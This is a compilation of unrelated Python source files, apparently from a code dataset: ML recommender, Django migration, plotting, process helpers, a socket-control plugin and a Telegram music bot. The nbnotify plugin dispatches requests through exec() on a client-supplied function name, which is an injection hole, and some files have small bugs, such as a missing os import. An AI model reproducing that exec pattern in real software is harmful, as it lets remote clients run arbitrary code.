import fire
import numpy as np
from scipy.sparse.csr import csr_matrix
from sklearn.base import BaseEstimator
from sklearn.model_selection import cross_validate
from sklearn.preprocessing import normalize
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from .common.similarities import SIM_FUNCTIONS
from .common.dataset import prepare_shuffled_dataset
from .common.scorers import map_scorer, trr_scorer, nr_scorer
from .executor import BaseExecutor
# Scorer registry passed to sklearn's cross_validate: metric name -> scorer.
SCORING = {
    'MAP': map_scorer,
    'TRR': trr_scorer,
    'NR': nr_scorer
}
def do_nothing_tokenizer(tokens):
    """Identity tokenizer: inputs are already token lists, so pass through."""
    return tokens
class PerRecCBR(BaseEstimator):
    """CBR component for recommending permission lists.

    Input: A list of used apis.
    Output: The ranked permission list of the app.
    """
    def __init__(self, sim_func="cosine"):
        # Accept a callable directly, or resolve a registered similarity name.
        if callable(sim_func):
            self.sim_func = sim_func
        else:
            self.sim_func = SIM_FUNCTIONS.get(sim_func, None)
        if not self.sim_func:
            raise ValueError("Error sim_func" + str(sim_func))
    @staticmethod
    def build_perm_docs(perm_vectors, api_vectors):
        """Build permission profiles ("documents").

        Args:
            perm_vectors (Matrix): binary app-x-permission vectors
            api_vectors (Matrix): binary app-x-api vectors

        Returns:
            np.ndarray: one row per permission — the summed API usage of all
            apps that request that permission.
        """
        perm_docs = []
        # for each column of permission vectors (e.g., each permission)
        for col in perm_vectors.T:
            # find the apps which require this permission
            if isinstance(col, csr_matrix):
                col = col.toarray().reshape(-1, )
            apps = np.where(col == 1)
            # find the api vectors of such apps
            cur_api_vectors = api_vectors[apps].toarray()
            # construct permission doc by accumulating their API usage
            cur_perm_doc = cur_api_vectors.sum(axis=0)
            perm_docs.append(cur_perm_doc)
        return np.array(perm_docs)
    def fit(self, X, y):
        """Build the profiles for training permissions.

        Args:
            X (List(List(API))): The api lists of the training apps.
            y (List(List(Perm))): The permission lists of all apps.

        Returns:
            self object: return self
        """
        # Steps:
        # 1. build permission doc
        # 2. calculate the tfidf vector for each permission doc as the profiles of permissions
        # 3. build API CountVectorizer
        self.api_vectorizer_ = CountVectorizer(binary=True, tokenizer=do_nothing_tokenizer,
                                               preprocessor=None, lowercase=False)
        self.train_api_vectors_ = self.api_vectorizer_.fit_transform(X)
        self.perm_vectorizer_ = CountVectorizer(binary=True, tokenizer=do_nothing_tokenizer,
                                                preprocessor=None, lowercase=False)
        self.train_perm_vectors_ = self.perm_vectorizer_.fit_transform(y)
        self.perm_list_ = self.perm_vectorizer_.get_feature_names()
        # build permission doc
        self.perm_docs_ = self.build_perm_docs(self.train_perm_vectors_, self.train_api_vectors_)
        # idf = log(total_num / num) + 1
        self.tfidf_transformer_ = TfidfTransformer(norm="l1", use_idf=True, smooth_idf=False)
        tfidf_matrix = self.tfidf_transformer_.fit_transform(self.perm_docs_)
        self.perm_profiles_ = normalize(tfidf_matrix, norm='l2', axis=1)
        # Bug fix: fit() must return self (sklearn estimator contract — the
        # docstring promised it but the original returned None).
        return self
    def transform(self, X, *fit_params):
        """Recommend permissions for new apps.

        Args:
            X (List(List(API))): A list of apps for testing.

        Returns:
            Perms (List(List(Permission))): The ranked permission lists
            recommended for input apps.
        """
        # ranked the permissions
        # construct app profiles (api vectors)
        test_api_vectors = self.api_vectorizer_.transform(X)
        # calculate the similarities between API vector and permission profiles
        # test_num * perm_num
        similarities = self.sim_func(test_api_vectors, self.perm_profiles_)
        perm_scores = normalize(similarities, norm="l1", axis=1)
        # for fusion
        self.perm_scores_ = perm_scores
        # each row: perm_i, perm_j, perm_k (sorted, best first)
        sorted_perm_index = np.argsort(-1.0 * perm_scores, 1)
        return np.take(self.perm_list_, sorted_perm_index)
    def predict(self, X):
        """Alias of transform, for scorer compatibility."""
        return self.transform(X)
class CBR(BaseExecutor):
    """Executor wrapping PerRecCBR in 10-fold cross-validation."""
    def __init__(self, dataset, scoring, **kwargs):
        super().__init__("CBR", dataset, scoring)
        self.sim_func = kwargs.get("sim_func", "cosine")
        # NOTE(review): smooth_idf is stored and used in the result file name
        # but never passed to the estimator — confirm intent.
        self.smooth_idf = kwargs.get("smooth_idf", True)
    def get_result_file(self, data_dir):
        # File name encodes the configuration, e.g. "CBR_cosine_True.json".
        file_name = "_".join([self.name, self.sim_func, str(self.smooth_idf)])
        return os.path.join(data_dir, file_name + ".json")
    def construct_estimator(self):
        return PerRecCBR(sim_func=self.sim_func)
    def run(self):
        # 10-fold CV over (api lists -> permission lists), all cores.
        api_lists = self.dataset.extract_api_lists()
        perm_lists = self.dataset.extract_perm_lists()
        estimator = self.construct_estimator()
        scores = cross_validate(estimator, api_lists, perm_lists, scoring=self.scoring, cv=10,
                                n_jobs=-1, verbose=1, return_train_score=False)
        return scores
def main(sim_func="cosine"):
    """CLI entry point: run cross-validation for the CBR recommender and
    print the mean test MAP."""
    dataset = prepare_shuffled_dataset()
    scoring = SCORING
    executor = CBR(dataset, scoring, sim_func=sim_func)
    scores = executor.run()
    print(scores['test_MAP'].mean())
if __name__ == "__main__":
    # Expose `main` as a fire sub-command: python -m ... main --sim_func=...
    fire.Fire({
        'main': main
    })
| 5,636 | 1,709 |
# Generated by Django 3.2 on 2021-05-05 12:10
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated (Django 3.2) migration: update help_text on the
    Firmware model's binary_file_url and public_key fields.

    NOTE: generated code — edit with care so the migration history stays
    consistent.
    """
    dependencies = [
        ('registry', '0040_auto_20210216_1404'),
    ]
    operations = [
        migrations.AlterField(
            model_name='firmware',
            name='binary_file_url',
            field=models.URLField(help_text='Enter a url from where the firmware can be downloaded'),
        ),
        migrations.AlterField(
            model_name='firmware',
            name='public_key',
            field=models.TextField(help_text='Enter a SHA / Digest or public key to test used to secure the firmware'),
        ),
    ]
| 675 | 217 |
import csv
import sys
import json
import pandas as pd
import os
import logging
# Configure the path
# NOTE(review): hard-coded absolute path ties this script to one machine;
# consider an env var or CLI argument instead.
os.chdir('/home/emi/unipd/Sartori_CBSD/project/cbsdproject')
# Load the labelled accounts, skipping the first spreadsheet row.
accounts = pd.read_excel('LabelledAccounts.xlsx', skiprows=1)
import operator
import collections
def get_party_label(votes, porcentage=0.75):
    """Return the majority party label if judge agreement meets the threshold.

    Args:
        votes: Iterable of party labels, one per judge.
        porcentage: Fraction of judges that must agree (default 0.75).

    Returns:
        The most common party if it received at least ``porcentage`` of the
        votes, otherwise an empty string.
    """
    # Integer vote threshold, e.g. 5 judges at 0.75 -> int(3.75) == 3.
    threshold = int(len(votes) * porcentage)
    max_party, max_votes = collections.Counter(votes).most_common(1)[0]
    # Bug fix: the original compared with ``==``, which rejected agreement
    # ABOVE the threshold (e.g. 5/5 unanimous votes with a 3-vote threshold).
    if max_votes >= threshold:
        return max_party
    return ''
# Pre-allocate the per-account party-threshold column (one entry per account).
# Bug fix: the original called np.zeros() with no shape argument, and numpy
# was never imported — both raised at runtime.
import numpy as np  # local import, consistent with this script's mid-file imports
accounts['party_threshold'] = pd.Series(np.zeros(len(accounts)))
# Fix a threshold about the political party labelling
# (we suggest to repeat the analysis with the 100% of agreement of the five judges
# and with the 75% of agreement of the five judges)
data = pd.read_csv('Tweets/Massimogazza_tweets.csv')
data.head()
| 847 | 296 |
import itertools
import random
import orco
# Function that trains "players"
@orco.builder()
def train_player(config):
    # We will simulate trained players by a dictionary with a "strength" key
    # drawn uniformly at random; `config` identifies the player being trained.
    return {"strength": random.randint(0, 10)}
# Build function for "games"
@orco.builder()
def play_game(config):
    # Everything before the `yield` only declares dependencies on the two
    # trained players; orco computes them before resuming this builder.
    player1 = train_player(config["player1"])
    player2 = train_player(config["player2"])
    yield
    # Simulation of playing a game between two players.
    # They just throw k-sided dices, where k is the strength of the player.
    # The difference of the throws is the result.
    r1 = random.randint(0, player1.value["strength"] * 2)
    r2 = random.randint(0, player2.value["strength"] * 2)
    return r1 - r2
# Build function for a tournament, return score for each player
@orco.builder()
def play_tournament(config):
    # For evaluating a tournament, we need to know the results of games between
    # each pair of its players (declared before the yield as dependencies).
    games = [
        play_game({"player1": p1, "player2": p2})
        for (p1, p2) in itertools.product(config["players"], config["players"])
    ]
    yield
    # Tally per-player scores: a positive game value favours player1.
    score = {}
    for game in games:
        player1 = game.config["player1"]
        player2 = game.config["player2"]
        score.setdefault(player1, 0)
        score.setdefault(player2, 0)
        score[player1] += game.value
        score[player2] -= game.value
    return score
# Entry point: hand control to orco's CLI (serve / compute / etc.).
orco.run_cli()
| 1,410 | 449 |
import os
from pathlib import Path
import brainrender
from brainrender import Scene, actor, Animation
from rich import color, print
from myterial import orange
from vedo import Volume, io, load, show
import numpy as np
import pandas as pd
import util
# path names and roi names
paths = util.get_paths()
roi_names = util.roi_names()
print(f"[{orange}]Running example: {Path(__file__).name}")
# Create a brainrender scene
scene = Scene(title="Injection ROIs", atlas_name='allen_mouse_10um')
# injection site meshes (one .obj file per ROI)
mesh_names = [os.path.join(paths['data'], 'meshes', f'{roi}.obj') for roi in roi_names]
meshes = [load(cur_name) for cur_name in mesh_names]
# overlapping atlas rois (CSV of atlas acronyms per ROI)
csv_names_atlas = [os.path.join(paths['data'], 'csv_acronyms', f'{roi}.csv') for roi in roi_names]
csv_atlas_acronym = [pd.read_csv(name) for name in csv_names_atlas]
# One color per ROI — assumes exactly three ROIs; TODO confirm.
colors = ['#6DB546', '#C30017', '#9D9D9C']
alpha_rois = 0.6
for cur_idx, cur_mesh in enumerate(meshes):
    # Create the injection site actors
    cur_actor = actor.Actor(cur_mesh,
                            name=roi_names[cur_idx],
                            color=colors[cur_idx],
                            alpha=alpha_rois)
    scene.add(cur_actor)
    scene.add_silhouette(cur_actor)
    # Overlapping atlas
    # NOTE(review): computed but unused — only consumed by the commented-out
    # add_brain_region call below.
    cur_overlapping_acronyms = list(csv_atlas_acronym[cur_idx]["acronym_keepSingleChild"])
    # scene.add_brain_region(*cur_overlapping_acronyms,
    #                        alpha=0.2,
    #                        color=colors[cur_idx],
    #                        hemisphere='right')
# Render and save screen shots
screen_shot_dir = os.path.join(paths['data'], 'screen_shots_no_region')
os.makedirs(screen_shot_dir, exist_ok = True)
camera_names = list(brainrender.camera.cameras.keys())
# NOTE(review): assumes brainrender defines exactly 6 cameras — zoom_vals is
# indexed in lockstep with camera_names; confirm against the installed version.
zoom_vals = [2.0, 0.8, 1.0, 1.0, 1.0, 1.0]
for idx, c in enumerate(camera_names):
    scene.render(camera=c, zoom=zoom_vals[idx], interactive=False)
    scene.screenshot(name=os.path.join(screen_shot_dir, f'{c}_alpha_{alpha_rois}.png'))
# Animation
animate_flag = True
if animate_flag:
    anim = Animation(scene, screen_shot_dir, "ROI_inj_animation",size="6480x4200")
    # Specify camera position and zoom at some key frames
    # each key frame defines the scene's state after n seconds have passed
    anim.add_keyframe(0, camera="top", zoom=0.3)
    anim.add_keyframe(5, camera="sagittal", zoom=1.0)
    anim.add_keyframe(9, camera="frontal", zoom=1.0)
    anim.add_keyframe(
        10,
        camera="frontal",
    )
    # Make videos
    anim.make_video(duration=10, fps=10)
"""WizardKit: Execution functions"""
#vim: sts=2 sw=2 ts=2
import json
import logging
import os
import re
import subprocess
import time
from threading import Thread
from queue import Queue, Empty
import psutil
# STATIC VARIABLES
LOG = logging.getLogger(__name__)
# Classes
class NonBlockingStreamReader():
    """Class to allow non-blocking reads from a stream."""
    # pylint: disable=too-few-public-methods
    # Credits:
    ## https://gist.github.com/EyalAr/7915597
    ## https://stackoverflow.com/a/4896288
    def __init__(self, stream):
        # stream: the stream to drain, e.g. a child process' stdout pipe.
        self.stream = stream
        self.queue = Queue()
        def populate_queue(stream, queue):
            """Collect lines from stream and put them in queue."""
            # Reads one byte at a time so the reader never blocks waiting for
            # a full line; the thread exits once the stream is closed.
            while not stream.closed:
                try:
                    line = stream.read(1)
                except ValueError:
                    # Assuming the stream was closed
                    line = None
                if line:
                    queue.put(line)
        # Background daemon thread that continuously drains the stream.
        self.thread = start_thread(
            populate_queue,
            args=(self.stream, self.queue),
        )
    def stop(self):
        """Stop reading from input stream."""
        # Closing the stream ends the populate_queue loop above.
        self.stream.close()
    def read(self, timeout=None):
        """Read from queue if possible, returns item from queue.

        Returns None when nothing is available (immediately if timeout is
        None, otherwise after waiting up to `timeout` seconds).
        """
        try:
            return self.queue.get(block=timeout is not None, timeout=timeout)
        except Empty:
            return None
    def save_to_file(self, proc, out_path):
        """Continuously save output to file while proc is running."""
        LOG.debug('Saving process %s output to %s', proc, out_path)
        while proc.poll() is None:
            out = b''
            out_bytes = b''
            # Drain everything currently queued; read() yields None when empty.
            while out is not None:
                out = self.read(0.1)
                if out:
                    out_bytes += out
            with open(out_path, 'a', encoding='utf-8') as _f:
                _f.write(out_bytes.decode('utf-8', errors='ignore'))
        # Close stream to prevent 100% CPU usage
        self.stream.close()
# Functions
def build_cmd_kwargs(cmd, minimized=False, pipe=True, shell=False, **kwargs):
    """Build kwargs for use by subprocess functions, returns dict.

    Specifically subprocess.run() and subprocess.Popen().

    NOTE: If no encoding specified then UTF-8 will be used.
    """
    LOG.debug(
        'cmd: %s, minimized: %s, pipe: %s, shell: %s, kwargs: %s',
        cmd, minimized, pipe, shell, kwargs,
    )
    cmd_kwargs = {
        'args': cmd,
        'shell': shell,
    }
    # Strip sudo if appropriate
    # NOTE(review): assumes cmd is a list — for a shell command string,
    # cmd[0] is a single character and this check never matches; confirm.
    if cmd[0] == 'sudo':
        if os.name == 'posix' and os.geteuid() == 0:  # pylint: disable=no-member
            cmd.pop(0)
    # Add additional kwargs if applicable
    for key in 'check cwd encoding errors stderr stdin stdout'.split():
        if key in kwargs:
            cmd_kwargs[key] = kwargs[key]
    # Default to UTF-8 encoding
    if not ('encoding' in cmd_kwargs or 'errors' in cmd_kwargs):
        cmd_kwargs['encoding'] = 'utf-8'
        cmd_kwargs['errors'] = 'ignore'
    # Start minimized
    # NOTE(review): STARTUPINFO is a Windows-only subprocess API — callers are
    # presumably expected not to pass minimized=True on POSIX; confirm.
    if minimized:
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
        startupinfo.wShowWindow = 6
        cmd_kwargs['startupinfo'] = startupinfo
    # Pipe output
    if pipe:
        cmd_kwargs['stderr'] = subprocess.PIPE
        cmd_kwargs['stdout'] = subprocess.PIPE
    # Done
    LOG.debug('cmd_kwargs: %s', cmd_kwargs)
    return cmd_kwargs
def get_json_from_command(cmd, check=True, encoding='utf-8', errors='ignore'):
    """Capture JSON content from cmd output, returns dict.

    If the data can't be decoded then either an exception is raised
    or an empty dict is returned depending on errors.
    """
    LOG.debug('Loading JSON data from cmd: %s', cmd)
    try:
        proc = run_program(cmd, check=check, encoding=encoding, errors=errors)
        return json.loads(proc.stdout)
    except (subprocess.CalledProcessError, json.decoder.JSONDecodeError):
        # Swallow the failure only in best-effort mode.
        if errors == 'ignore':
            return {}
        raise
def get_procs(name, exact=True, try_again=True):
    """Get process object(s) based on name, returns list of proc objects."""
    LOG.debug('name: %s, exact: %s', name, exact)
    # Anchor the pattern for exact (whole-name) matches.
    pattern = f'^{name}$' if exact else name
    matches = [
        proc for proc in psutil.process_iter()
        if re.search(pattern, proc.name(), re.IGNORECASE)
    ]
    # Retry once after a short pause in case the process is still starting.
    if not matches and try_again:
        time.sleep(1)
        matches = get_procs(name, exact, try_again=False)
    return matches
def kill_procs(name, exact=True, force=False, timeout=30):
    """Kill all processes matching name (case-insensitively).

    NOTE: This asks each process to exit via psutil's terminate()
    (SIGTERM on Posix systems), allowing a graceful shutdown.

    If force is True then it will wait until timeout specified and then
    send SIGKILL to any processes still alive.
    """
    LOG.debug(
        'name: %s, exact: %s, force: %s, timeout: %s',
        name, exact, force, timeout,
    )
    target_procs = get_procs(name, exact=exact)
    for proc in target_procs:
        proc.terminate()
    # Force kill if necesary
    if force:
        results = psutil.wait_procs(target_procs, timeout=timeout)
        for proc in results[1]:  # Alive processes
            proc.kill()
def popen_program(cmd, minimized=False, pipe=False, shell=False, **kwargs):
    """Run program and return a subprocess.Popen object."""
    LOG.debug(
        'cmd: %s, minimized: %s, pipe: %s, shell: %s',
        cmd, minimized, pipe, shell,
    )
    LOG.debug('kwargs: %s', kwargs)
    popen_kwargs = build_cmd_kwargs(
        cmd, minimized=minimized, pipe=pipe, shell=shell, **kwargs)
    try:
        # pylint: disable=consider-using-with
        child = subprocess.Popen(**popen_kwargs)
    except FileNotFoundError:
        # Log the missing executable for context, then propagate.
        LOG.error('Command not found: %s', cmd)
        raise
    LOG.debug('proc: %s', child)
    return child
def run_program(cmd, check=True, pipe=True, shell=False, **kwargs):
    # pylint: disable=subprocess-run-check
    """Run program and return a subprocess.CompletedProcess object."""
    LOG.debug(
        'cmd: %s, check: %s, pipe: %s, shell: %s',
        cmd, check, pipe, shell,
    )
    LOG.debug('kwargs: %s', kwargs)
    run_kwargs = build_cmd_kwargs(
        cmd, check=check, pipe=pipe, shell=shell, **kwargs)
    try:
        proc = subprocess.run(**run_kwargs)
    except FileNotFoundError:
        LOG.error('Command not found: %s', cmd)
        raise
    LOG.debug('proc: %s', proc)
    return proc
def start_thread(function, args=None, daemon=True):
    """Run function as thread in background, returns Thread object."""
    LOG.debug(
        'Starting background thread for function: %s, args: %s, daemon: %s',
        function, args, daemon,
    )
    # Falsy args (None, empty) become an empty argument list
    worker = Thread(target=function, args=args or [], daemon=daemon)
    worker.start()
    return worker
def stop_process(proc, graceful=True):
    """Stop process.

    NOTES: proc should be a subprocess.Popen obj.
           If graceful is True then a SIGTERM is sent before SIGKILL.
    """
    def _needs_sudo():
        # Non-root POSIX users must escalate to signal the process
        return os.name == 'posix' and os.geteuid() != 0  # pylint: disable=no-member

    # Graceful exit
    if graceful:
        if _needs_sudo():
            run_program(['sudo', 'kill', str(proc.pid)], check=False)
        else:
            proc.terminate()
        time.sleep(2)
    # Force exit
    if _needs_sudo():
        run_program(['sudo', 'kill', '-9', str(proc.pid)], check=False)
    else:
        proc.kill()
def wait_for_procs(name, exact=True, timeout=None):
    """Wait for all process matching name."""
    LOG.debug('name: %s, exact: %s, timeout: %s', name, exact, timeout)
    _, alive = psutil.wait_procs(get_procs(name, exact=exact), timeout=timeout)
    # Raise if anything outlived the timeout
    if alive:
        raise psutil.TimeoutExpired(name=name, seconds=timeout)
# This module is a library; warn when executed directly.
if __name__ == '__main__':
    print("This file is not meant to be called directly.")
| 7,664 | 2,596 |
# TODO: 5 (if…else Statements) Reimplement the script of Fig2.1. using three
# if…else statements rather than six if statements. [Hint: For example,
# think of == and != as “opposite” tests.]
print('Enter two integers and I will tell you',
      'the relationships they satisfy.')

# read first integer
number1 = int(input('Enter first integer: '))

# read second integer
number2 = int(input('Enter second integer: '))

# == and != are opposite tests
if number1 == number2:
    print(number1, 'is equal to', number2)
else:
    print(number1, 'is not equal to', number2)

# < and >= are opposite tests: when "less than" fails, the first number
# is greater than OR EQUAL to the second (the original printed plain
# "greater than" here, which is wrong when the numbers are equal)
if number1 < number2:
    print(number1, 'is less than', number2)
else:
    print(number1, 'is greater than or equal to', number2)

# <= and > are opposite tests: when "less than or equal" fails, the first
# number is strictly greater (the original printed "greater than or equal
# to" here, which overstates the relation)
if number1 <= number2:
    print(number1, 'is less than or equal to', number2)
else:
    print(number1, 'is greater than', number2)
| 808 | 258 |
#-*- coding: utf-8 -*-
import libnbnotify
import socket
import ssl
import json
import asyncore
import re
import sys
from threading import Thread
import string
import random
import os
import BaseHTTPServer, SimpleHTTPServer
# Plugin metadata consumed by the libnbnotify plugin loader.
PluginInfo = {'Requirements' : { 'OS' : 'All'}, 'API': 2, 'Authors': 'webnull', 'domain': '', 'type': 'extension', 'isPlugin': False, 'Description': 'Remote control throught sockets'}
# Module-level reference to the application object; assigned in
# PluginMain._pluginInit() and read by SocketInterface.handle_read().
app = ""
def id_generator(size=6, chars=string.ascii_uppercase + string.digits):
    """Return a random identifier of `size` characters drawn from `chars`."""
    picked = [random.choice(chars) for _ in range(size)]
    return ''.join(picked)
class SocketInterface(SimpleHTTPServer.SimpleHTTPRequestHandler):
    """ Very simple socket interface.

    Python 2 HTTP request handler: POST bodies carry a JSON command
    {'function': ..., 'data': ...} that handle_read() dispatches to the
    method of the same name on this class.
    """

    def log_message(self, format, *args):
        # Silence the default per-request stderr logging of the base handler
        return False

    def ping(self, data=''):
        # Liveness probe
        return "pong";

    def getConfigAndEntries(self, data=''):
        """ Returns all configuration variables and links """
        return [self.app.configGetSection('links'), self.app.Config.Config]

    def getAllEntries(self, data=''):
        """ Returns all links from database """
        return self.app.configGetSection('links')

    def notifyNewData(self, data):
        """ Create new notification from data (keys: data, title, icon, pageid) """
        content = data['data']
        title = data['title']
        icon = data['icon']
        pageID = data['pageid']
        self.app.notifyNewData(content, title, icon, pageID)

    def configSetKey(self, data):
        """ Set configuration key (keys: section, option, value) """
        Section = data['section']
        Option = data['option']
        Value = data['value']
        return self.app.configSetKey(Section, Option, Value)

    def saveConfiguration(self, data=''):
        """ Force save configuration to file """
        return self.app.saveConfiguration()

    def configGetSection(self, data):
        """ Returns section as dictionary

        Args:
            data - name of section of ini file ([section] header)

        Returns:
            Dictionary - on success
            False - on failure
        """
        return self.app.configGetSection(data)

    def configGetKey(self, data):
        """ Returns value of Section->Key configuration variable

        Args:
            data - dict with 'section' (ini [section] header) and 'key'

        Returns:
            False - when section or key does not exist
            False - when value of variable is "false" or "False" or just False
            string value - value of variable
        """
        Section = data['section']
        Key = data['key']
        return self.app.configGetKey(Section, Key)

    def addPage(self, link):
        """ Add page to database, return True if added successfully """
        return self.app.addPage(link)

    def setType(self, data):
        """ Set specified extension to handle specified link

        Return md5 hash of link on success
        """
        Link = data['link']
        Type = data['type']
        return self.app.setType(Link, Type)

    def removePage(self, pageID):
        """ Remove page with specified pageID """
        return self.app.removePage(pageID)

    def loadCommentsFromDB(self, data=''):
        """ Reload comments cache from SQLite database """
        return self.app.loadCommentsFromDB()

    def configCheckChanges(self, data=''):
        """ Reload configuration if changed """
        return self.app.configCheckChanges()

    def togglePlugin(self, data):
        """ Activate or deactivate plugin

        Keys: name - name of plugin, toggle - True or False
        """
        Plugin = data['name']
        Toggle = data['toggle']
        if Toggle == True:
            return self.app.togglePlugin(Plugin, 'activate')
        return self.app.togglePlugin(Plugin, 'deactivate')

    def do_POST(self):
        # Read the raw POST body and hand it to the JSON command dispatcher
        contentLen = int(self.headers.getheader('content-length'))
        postBody = self.rfile.read(contentLen)
        # response
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(self.handle_read(postBody))

    def do_GET(self):
        # GET is not part of the command protocol; answer a static greeting
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write("Hello world.")

    def handle_read(self, data):
        # Dispatch a JSON command body to the matching method on this class.
        global app
        self.app = app
        if data:
            if data == "ping":
                return "pong"
            try:
                #if t == False:
                #    return "Error: Cannot parse HTTP request, "+str(t)+", "+str(jsonData)
                if data == False:
                    return "Error: Cannot parse HTTP request, empty request, "+str(jsonData)
                text = json.loads(data)
                # Block dispatch to internal/bootstrap methods
                if text['function'] == "handle_read" or text['function'] == "__init__" or text['function'] == "httpRequestParser":
                    return "Error: Function not avaliable"
                if hasattr(self, text['function']):
                    # NOTE(review): exec-based dispatch interpolates a
                    # client-supplied name into source code; getattr(...)
                    # would be the safer equivalent — confirm before changing.
                    exec("r = str(self."+text['function']+"(text['data']))")
                else:
                    r = "Error: Function not found"
                self.app.Logging.output("Socket::GET="+str(text['function'])+"&addr="+str(self.client_address[0]), "debug", False)
                # send response
                return json.dumps({'response': r})
            except Exception as e:
                self.app.Logging.output("SubgetSocketInterface: Cannot parse json data, is the client bugged? "+str(e), "warning", True)
                return "Error: "+str(e)
class SocketServer:
    """ Minimal blocking HTTP listener dispatching to SocketInterface """

    # Defaults, overridden per-instance via __init__
    host = "127.0.0.1"
    port = 9954

    def __init__(self, host, port):
        self.host = host
        self.port = port

    def serve(self):
        """ Bind the HTTP server and serve requests forever (blocking) """
        server = BaseHTTPServer.HTTPServer((self.host, self.port), SocketInterface)
        server.serve_forever()
class PluginMain(libnbnotify.Plugin):
    """ Plugin entry point: starts the HTTP "bus" control socket on a
    daemon thread, with host/port taken from the [bus_socket] config. """

    name = "bus"
    # Defaults; overridden from the [bus_socket] configuration section
    host = "127.0.0.1"
    port = 9954
    # Holds the SocketServer instance once startServer() has run
    bus = ""

    def _pluginInit(self):
        #self.initSSL()
        global app
        # Expose the application object to SocketInterface.handle_read()
        app = self.app
        self.host = str(self.app.Config.getKey("bus_socket", "host", "127.0.0.1"))
        # Ensure a valid integer port in the config, falling back to 9954
        if self.app.Config.getKey("bus_socket", "port") == False:
            self.app.Config.setKey("bus_socket", "port", 9954)
        else:
            try:
                self.port = int(self.app.Config.getKey("bus_socket", "port"))
            except ValueError:
                self.port = 9954
                self.app.Config.setKey("bus_socket", "port", 9954)
        # Only start the socket server outside of CLI mode
        if self.app.cli == False:
            self.startServer()
            return True
        else:
            return False

    #def initSSL(self):
    #    path = os.path.expanduser("~/.nbnotify/ssl")
    # create ssl directory
    #    if not os.path.isdir(path):
    #        os.mkdir(path)
    #    if not os.path.isfile(path+"/private.pem"):
    #        passwd = id_generator(size=32)
    #        self.app.Logging.output("Cannot find SSL cert, creating new one...", "debug", True)
    #        os.system("openssl genrsa -out "+path+"/private.pem 1024")
    #        os.system("openssl rsa -in "+path+"/private.pem -pubout > "+path+"/public.pem")

    def startServer(self):
        # Launch SocketServer.serve() on a daemon thread so it dies with
        # the main process; exit if the port is already taken.
        try:
            self.app.Logging.output("Socket server is running on "+str(self.host)+":"+str(self.port), "debug", False)
            self.bus = SocketServer(self.host, self.port)
            self.thread = Thread(target=self.bus.serve)
            self.thread.setDaemon(True)
            self.thread.start()
        except Exception as e:
            self.app.Logging.output("Only one instance of nbnotify is allowed, "+str(e), "debug", False)
            sys.exit(0)
| 7,815 | 2,254 |
import json
import os
import time

import requests
import youtube_dl
from pyrogram import Client, filters
from pyrogram.types import (
    InlineKeyboardButton,
    InlineKeyboardMarkup
)
from youtube_search import YoutubeSearch
# Load the Telegram credentials from the local JSON config file.
with open('./config.json', 'r') as config:
    data = json.load(config)

bot_token = data['token']
api_id = data['api_id']
api_hash = data['api_hash']

# Pyrogram client for the bot session named 'Clara'.
bot = Client(
    'Clara',
    bot_token = bot_token,
    api_id = api_id,
    api_hash = api_hash
)
# Convert hh:mm:ss to seconds
def time_to_seconds(time):
    """Convert a 'hh:mm:ss' / 'mm:ss' / 'ss' string to total seconds."""
    total = 0
    # Walk the parts right-to-left: seconds, minutes, hours, ...
    for power, part in enumerate(reversed(str(time).split(':'))):
        total += int(part) * 60 ** power
    return total
@bot.on_message(filters.command(['start']))
def start(client, message):
    """Greet the user on /start and explain the /a download command."""
    help_text = f'👋 Hello @{message.from_user.username}\n I\'m Clara, developed by Shambo, I can download songs from YouTube. Type /a song name\n e.g - `/a tokyo drift`'
    github_button = InlineKeyboardButton('Github', url='https://github.com/typhonshambo')
    message.reply_text(
        text=help_text,
        quote=False,
        reply_markup=InlineKeyboardMarkup([[github_button]]),
    )
@bot.on_message(filters.command(['a']))
def a(client, message):
    """Search YouTube for the requested song, download its audio with
    youtube_dl and reply with the audio file plus title/duration/views.

    Refuses videos longer than 30 minutes; cleans up the downloaded
    audio and thumbnail files afterwards.
    """
    query = ''
    for i in message.command[1:]:
        query += ' ' + str(i)
    print(query)
    m = message.reply('🔎 Searching the song...')
    ydl_opts = {"format": "bestaudio[ext=m4a]"}
    try:
        # Retry the search a few times: YoutubeSearch occasionally returns
        # an empty result set on a first attempt.
        results = []
        count = 0
        while len(results) == 0 and count < 6:
            if count > 0:
                # BUG FIX: was os.times.sleep(1) — os.times is a function
                # and has no sleep attribute (AttributeError at runtime).
                time.sleep(1)
            results = YoutubeSearch(query, max_results=1).to_dict()
            count += 1
        try:
            link = f"https://youtube.com{results[0]['url_suffix']}"
            title = results[0]["title"]
            thumbnail = results[0]["thumbnails"][0]
            duration = results[0]["duration"]
            ## UNCOMMENT THIS IF YOU WANT A LIMIT ON DURATION. CHANGE 1800 TO YOUR OWN PREFFERED DURATION AND EDIT THE MESSAGE (30 minutes cap) LIMIT IN SECONDS
            if time_to_seconds(duration) >= 1800:  # duration limit
                m.edit("Exceeded video duration limit : 30 mins")
                return
            views = results[0]["views"]
            thumb_name = f'thumb{message.message_id}.jpg'
            thumb = requests.get(thumbnail, allow_redirects=True)
            # Context manager closes the file handle promptly (the original
            # open(...).write(...) leaked the handle).
            with open(thumb_name, 'wb') as thumb_file:
                thumb_file.write(thumb.content)
        except Exception as e:
            print(e)
            m.edit('Found nothing. Try changing the spelling a little.')
            return
    except Exception as e:
        m.edit(
            "✖️ Found Nothing. Sorry.\n\nTry another keywork or maybe spell it properly."
        )
        print(str(e))
        return
    m.edit("⏬ Downloading.")
    try:
        with youtube_dl.YoutubeDL(ydl_opts) as ydl:
            info_dict = ydl.extract_info(link, download=False)
            audio_file = ydl.prepare_filename(info_dict)
            ydl.process_info(info_dict)
        rep = f'🎧 **Title**: [{title[:35]}]({link})\n⏳ **Duration**: `{duration}`\n👁🗨 **Views**: `{views}`'
        # Reuse the module helper instead of re-deriving seconds by hand.
        dur = time_to_seconds(duration)
        message.reply_audio(audio_file, caption=rep, parse_mode='md',quote=False, title=title, duration=dur, thumb=thumb_name)
        m.delete()
    except Exception as e:
        m.edit('❌ Error')
        print(e)
    # Best-effort cleanup of the downloaded files.
    try:
        os.remove(audio_file)
        os.remove(thumb_name)
    except Exception as e:
        print(e)
bot.run()
| 3,738 | 1,262 |
'''
Bouncing Ball Simulation
This is an implementation of a bouncing ball simulation using mainly the Tkinter library in Python.
